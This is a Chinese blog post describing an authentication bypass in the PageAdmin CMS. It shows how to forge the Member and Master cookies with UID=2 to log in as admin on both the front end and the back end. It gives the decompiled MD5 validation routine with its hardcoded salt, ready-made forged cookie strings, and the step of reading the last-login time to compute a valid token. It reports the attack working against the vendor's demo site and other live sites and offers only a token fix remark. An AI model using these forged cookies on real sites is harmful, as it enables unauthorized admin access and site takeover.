PageAdmin可绕过验证伪造任意用户身份登录（前台

原来是有一个验证的，但是不小心就想到办法绕过去了

先大概说一下流程：

前台：

初步身份伪造-->获取某项信息-->程序计算-->伪造最终cookie登录成功

后台（特别注意！）：

先成功伪造身份登录前台-->打开后台页面（注意让他重新获取cookie）-->程序计算-->利用伪造的cookie打开index

后台的必须按上面的流程走，没有登录前台的话会导致后台校验失败，有太多多余的cookie的话会导致后台登录后报错！

前台

第一步，初步身份伪造

问题代码：

text = Member_Valicate.aC7c4DsFNKxcZ9Ao2KU(Member_Valicate.KfvFKOso9G8UQWWkflb(HttpContext.Current).Cookies["Member"].Values, "UID");

直接从Member里面获取UID的值。

http://demo.pageadmin.net/e/member/index.aspx?s=1&type=mem_idx

cookie添加

Member=UID=2&Valicate=f75efb546591145c2ab152c1194ad10613df3

UID=2啥意思就不解释了，admin默认的uid是2

PageAdmin可绕过验证伪造任意用户身份登录（前台插图

添加cookie之后访问上面的链接，即可：

PageAdmin可绕过验证伪造任意用户身份登录（前台插图1

测试另外一个网站：

PageAdmin可绕过验证伪造任意用户身份登录（前台插图2

PageAdmin可绕过验证伪造任意用户身份登录（前台插图3

本地测试：

PageAdmin可绕过验证伪造任意用户身份登录（前台插图4

但是在执行部分操作的时候是提示Valicate是无效的，如下图

PageAdmin可绕过验证伪造任意用户身份登录（前台插图5

再说下这个验证的代码：

b =Member_Valicate.KfvFKOso9G8UQWWkflb(HttpContext.Current).Cookies["Member"].Values["Valicate"].ToString();
                    this.U8VWxh9WtC = ((DateTime)oleDbDataReader["lastdate"]).ToString("yyyyMMddHHmmss"); 
                    flag = !(md.Get_Md5(this.U8VWxh9WtC) != b); //把两个货比较，很悲剧啊
                    if (!flag)
                    {
                        this.tfYWhhmueR();
                        Member_Valicate.sVS2ySs4W4iMlcmVLhA(HttpContext.Current.Response, "<script type='text/javascript'>alert('invalid verification!');location.href='" + str + "';</script>");
                        arg_2A4_0 = 10;
                        continue;
                    }

b是你cookie中的valicate，U8VWxh9WtC是从数据库中读取出来的lastdate（最后登录时间），如下图

PageAdmin可绕过验证伪造任意用户身份登录（前台插图6

好吧，看到这里是不是觉得无解了？无法绕过？最后登录时间怎么搞啊？哈哈

第二步，获取“某项”信息

简单，仔细看登录后的页面：

PageAdmin可绕过验证伪造任意用户身份登录（前台插图7

014-5-22 10:17:18

明白没？虽然我们做不了别的操作，但是关键信息已经获取到了！

第三步，该上程序了！

关键的校验md5生成代码：

public string Get_Md5(string s)
{
    MD5 mD = new MD5CryptoServiceProvider();
    Encoding encoding = Encoding.GetEncoding("UTF-8");
    string s2 = "pageadmin cms";
    byte[] array = mD.ComputeHash(encoding.GetBytes(s));
    byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2));
    StringBuilder stringBuilder = new StringBuilder(32);
    for (int i = 0; i < array.Length; i++)
    {
        stringBuilder.Append(((int)(array[i] + array2[i])).ToString("x").PadLeft(2, '0'));
    }
    return stringBuilder.ToString();
}

呵呵了吗？

PageAdmin可绕过验证伪造任意用户身份登录（前台插图8

用伪造好的东西（eee开头那串），上！

最终步骤！

PageAdmin可绕过验证伪造任意用户身份登录（前台插图9

呵呵了！做任何操作都没有限制！

后台

在cookie中直接添加以下字段：

tongji=1; referer=; Master=UID=2&Valicate=d7133f6117b1ccd18ae511e1971851867912516a; SiteId=1

PageAdmin可绕过验证伪造任意用户身份登录（前台插图10

功访问后台！

试试官网：

PageAdmin可绕过验证伪造任意用户身份登录（前台插图11

但做其它操作会还是会提示：

PageAdmin可绕过验证伪造任意用户身份登录（前台插图12

原理和上面是一样的时间也是一样的具体不多说了，简单放几行代码

this.TclWJqMrlI = ((DateTime)oleDbDataReader["lastdate"]).ToString("yyyyMMddHHmmss");
string text2 = HttpContext.Current.Request.Cookies["Master"].Values["Valicate"].ToString();
flag = !Master_Valicate.e51WJWsgAgH9BDJaION(md.Get_Md5(this.TclWJqMrlI), text2);

上神器！

PageAdmin可绕过验证伪造任意用户身份登录（前台插图13

tongji=1; referer=; Master=UID=2&Valicate= eee0fe3b811371209c14611a157133188fee314a; SiteId=1

PageAdmin可绕过验证伪造任意用户身份登录（前台插图14

另外一个网站：

PageAdmin可绕过验证伪造任意用户身份登录（前台插图15

官网demo：

PageAdmin可绕过验证伪造任意用户身份登录（前台插图16

后台拿shell请看之前发布的漏洞

修复方案：

这套程序太经典了，居然可以发现那么多有代表性的漏洞……身份验证应该严格一点啊，这也太松散了

本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了，原文地址《PageAdmin可绕过验证伪造任意用户身份登录（前台》